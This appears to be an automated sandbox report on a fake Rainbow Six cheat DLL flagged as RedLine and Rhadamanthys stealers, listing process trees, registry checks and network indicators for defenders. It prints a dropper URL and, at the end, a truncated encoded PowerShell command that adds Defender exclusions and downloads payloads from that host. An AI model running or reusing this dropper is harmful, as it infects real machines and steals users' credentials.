redline | 553e980d8aef3f48b9b932c6379534ef324e595f9755b9b86001fd87b903ad0b

Analysis

max time kernel
112s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
04-07-2024 00:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

R6-Hack-main/d3dcompiler_47.dll
Size

4.7MB
MD5

2191e768cc2e19009dad20dc999135a3
SHA1

f49a46ba0e954e657aaed1c9019a53d194272b6a
SHA256

7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d
SHA512

5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970
SSDEEP

49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l

Score

10^/10

redline rhadamanthys discovery execution infostealer spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine payload 2 IoCs

Processes:

resource yara_rule

C:\Users\Admin\AppData\Roaming\xirquh4o.icu1.exe family_redline
behavioral1/memory/4676-507-0x0000000000050000-0x00000000000BA000-memory.dmp family_redline
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

q5hhwwsm.5lv2.exexirquh4o.icu2.exe

description pid process target process

PID 3560 created 3152 3560 q5hhwwsm.5lv2.exe sihost.exe
PID 60 created 3152 60 xirquh4o.icu2.exe sihost.exe

resource	yara_rule
C:\Users\Admin\AppData\Roaming\xirquh4o.icu1.exe	family_redline
behavioral1/memory/4676-507-0x0000000000050000-0x00000000000BA000-memory.dmp	family_redline

description	pid	process	target process
PID 3560 created 3152	3560	q5hhwwsm.5lv2.exe	sihost.exe
PID 60 created 3152	60	xirquh4o.icu2.exe	sihost.exe

Blocklisted process makes network request 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
121	2188	powershell.exe
123	2188	powershell.exe
129	4744	powershell.exe
133	4744	powershell.exe
134	1868	powershell.exe
135	1868	powershell.exe
140	1096	powershell.exe
141	5272	powershell.exe
142	5264	powershell.exe
147	1096	powershell.exe
148	5736	powershell.exe
149	5736	powershell.exe
153	6068	powershell.exe
154	3764	powershell.exe
155	2040	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1096	powershell.exe
5736	powershell.exe
5712	powershell.exe
2188	powershell.exe
4744	powershell.exe
1868	powershell.exe
5264	powershell.exe
5272	powershell.exe
3764	powershell.exe
6068	powershell.exe
2040	powershell.exe
2264	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ivzz1ktx.gzg3.exexirquh4o.icu3.exeq5hhwwsm.5lv3.exeeuljj2a5.0dl3.exeygx1vsb5.1kt3.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	ivzz1ktx.gzg3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	xirquh4o.icu3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	q5hhwwsm.5lv3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	euljj2a5.0dl3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	ygx1vsb5.1kt3.exe

Executes dropped EXE 20 IoCs

Processes:

xirquh4o.icu0.exexirquh4o.icu1.exexirquh4o.icu2.exexirquh4o.icu3.exeq5hhwwsm.5lv0.exeq5hhwwsm.5lv1.exeq5hhwwsm.5lv2.exeq5hhwwsm.5lv3.exeeuljj2a5.0dl0.exeeuljj2a5.0dl1.exeeuljj2a5.0dl2.exeeuljj2a5.0dl3.exeygx1vsb5.1kt0.exeygx1vsb5.1kt1.exeygx1vsb5.1kt2.exeygx1vsb5.1kt3.exeivzz1ktx.gzg0.exeivzz1ktx.gzg1.exeivzz1ktx.gzg2.exeivzz1ktx.gzg3.exe

pid	process
3540	xirquh4o.icu0.exe
4676	xirquh4o.icu1.exe
60	xirquh4o.icu2.exe
2652	xirquh4o.icu3.exe
884	q5hhwwsm.5lv0.exe
2140	q5hhwwsm.5lv1.exe
3560	q5hhwwsm.5lv2.exe
4116	q5hhwwsm.5lv3.exe
5184	euljj2a5.0dl0.exe
3644	euljj2a5.0dl1.exe
5704	euljj2a5.0dl2.exe
5676	euljj2a5.0dl3.exe
116	ygx1vsb5.1kt0.exe
4508	ygx1vsb5.1kt1.exe
5348	ygx1vsb5.1kt2.exe
2940	ygx1vsb5.1kt3.exe
5844	ivzz1ktx.gzg0.exe
1296	ivzz1ktx.gzg1.exe
3448	ivzz1ktx.gzg2.exe
432	ivzz1ktx.gzg3.exe

Loads dropped DLL 4 IoCs

Processes:

q5hhwwsm.5lv0.exeeuljj2a5.0dl0.exeygx1vsb5.1kt0.exeivzz1ktx.gzg0.exe

pid process

884 q5hhwwsm.5lv0.exe
5184 euljj2a5.0dl0.exe
116 ygx1vsb5.1kt0.exe
5844 ivzz1ktx.gzg0.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service
T1102

Processes:

flow ioc

123 bitbucket.org
133 bitbucket.org
135 bitbucket.org
147 bitbucket.org
149 bitbucket.org
162 bitbucket.org
110 camo.githubusercontent.com
122 bitbucket.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
884	q5hhwwsm.5lv0.exe
5184	euljj2a5.0dl0.exe
116	ygx1vsb5.1kt0.exe
5844	ivzz1ktx.gzg0.exe

flow	ioc
123	bitbucket.org
133	bitbucket.org
135	bitbucket.org
147	bitbucket.org
149	bitbucket.org
162	bitbucket.org
110	camo.githubusercontent.com
122	bitbucket.org

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133645259571329672"	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exexirquh4o.icu1.exeq5hhwwsm.5lv1.exepowershell.exexirquh4o.icu2.exeq5hhwwsm.5lv2.exeopenwith.exepowershell.exepowershell.exe

pid	process
4868	chrome.exe
4868	chrome.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
4744	powershell.exe
4744	powershell.exe
4744	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
1096	powershell.exe
1096	powershell.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
60	xirquh4o.icu2.exe
60	xirquh4o.icu2.exe
3560	q5hhwwsm.5lv2.exe
3560	q5hhwwsm.5lv2.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
4616	openwith.exe
4616	openwith.exe
1096	powershell.exe
4616	openwith.exe
4616	openwith.exe
5272	powershell.exe
5272	powershell.exe
5264	powershell.exe
5264	powershell.exe
5272	powershell.exe
5264	powershell.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
2140	q5hhwwsm.5lv1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe
4676	xirquh4o.icu1.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

chrome.exe

pid process

4868 chrome.exe
4868 chrome.exe
4868 chrome.exe
4868 chrome.exe
4868 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe
Token: SeShutdownPrivilege	4868	chrome.exe
Token: SeCreatePagefilePrivilege	4868	chrome.exe

Suspicious use of FindShellTrayWindow 47 IoCs

Processes:

chrome.exe

pid	process
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe
4868	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4868 wrote to memory of 2328	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 2328	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3416	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 2636	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 2636	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe
PID 4868 wrote to memory of 3504	4868	chrome.exe	chrome.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3152

C:\Windows\SysWOW64\openwith.exe
"C:\Windows\system32\openwith.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4616

C:\Windows\SysWOW64\openwith.exe
"C:\Windows\system32\openwith.exe"
2⤵
PID:5036

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\R6-Hack-main\d3dcompiler_47.dll,#1
1⤵
PID:4092

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff96ec1ab58,0x7ff96ec1ab68,0x7ff96ec1ab78
2⤵
PID:2328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:2
2⤵
PID:3416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:2636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:3504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2928 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:1
2⤵
PID:3988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:1
2⤵
PID:3736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4288 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:1
2⤵
PID:4440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:4748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4572 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:4048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:4620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4904 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:5036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:1392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5004 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:1
2⤵
PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2972 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:1
2⤵
PID:3548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3352 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:1500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:5036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3144 --field-trial-handle=2020,i,10690905568199815310,1270898383981845693,131072 /prefetch:8
2⤵
PID:1720

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1392

C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe
"C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\r6s.exe"
1⤵
PID:3280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgA